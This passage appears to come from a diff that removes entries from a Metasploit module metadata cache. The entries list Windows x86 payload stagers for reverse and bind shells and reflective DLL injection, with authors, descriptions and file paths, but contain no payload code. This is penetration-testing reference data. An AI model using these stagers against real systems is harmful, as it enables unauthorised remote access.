"windows/custom", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/custom/reverse_tcp_allports": { - "name": "Windows shellcode stage, Reverse All-Port TCP Stager", - "fullname": "payload/windows/custom/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/custom/reverse_tcp_dns": { - "name": "Windows shellcode stage, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/custom/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/custom/reverse_tcp_rc4": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/custom/reverse_tcp_rc4_dns": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/custom/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_rc4_dns", - 
"check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/custom/reverse_tcp_uuid": { - "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/custom/reverse_udp": { - "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/custom/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "RageLtMan " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": 
"windows/custom/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/custom/reverse_winhttp": { - "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/custom/reverse_winhttps": { - "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": 
"/modules/payloads/stagers/windows/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_windows/dllinject/bind_hidden_ipknock_tcp": { - "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/dllinject/bind_hidden_tcp": { - "name": "Reflective DLL Injection, Hidden Bind TCP Stager", - "fullname": "payload/windows/dllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/dllinject/bind_ipv6_tcp": { - "name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/dllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/dllinject/bind_ipv6_tcp_uuid": { - "name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/dllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": 
"Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/dllinject/bind_named_pipe": { - "name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/dllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/dllinject/bind_nonx_tcp": { - "name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/dllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/dllinject/bind_tcp": { - "name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/dllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp" - }, - 
"payload_windows/dllinject/bind_tcp_rc4": { - "name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/dllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/dllinject/bind_tcp_uuid": { - "name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/dllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": 
true, - "ref_name": "windows/dllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/dllinject/find_tag": { - "name": "Reflective DLL Injection, Find Tag Ordinal Stager", - "fullname": "payload/windows/dllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/dllinject/reverse_http": { - "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/dllinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": 
"x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/dllinject/reverse_http_proxy_pstore": { - "name": "Reflective DLL Injection, Reverse HTTP Stager Proxy", - "fullname": "payload/windows/dllinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/dllinject/reverse_ipv6_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/dllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - 
"hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/dllinject/reverse_nonx_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/dllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_nonx_tcp" 
- }, - "payload_windows/dllinject/reverse_ord_tcp": { - "name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/dllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "spoonm " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/dllinject/reverse_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager", - "fullname": "payload/windows/dllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/dllinject/reverse_tcp_allports": { - "name": "Reflective DLL Injection, Reverse All-Port TCP Stager", - "fullname": "payload/windows/dllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/dllinject/reverse_tcp_dns": { - "name": "Reflective DLL Injection, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/dllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - 
"platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/dllinject/reverse_tcp_rc4": { - "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/dllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/dllinject/reverse_tcp_rc4_dns": { - "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/dllinject/reverse_tcp_rc4_dns", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/dllinject/reverse_tcp_uuid": { - "name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/dllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
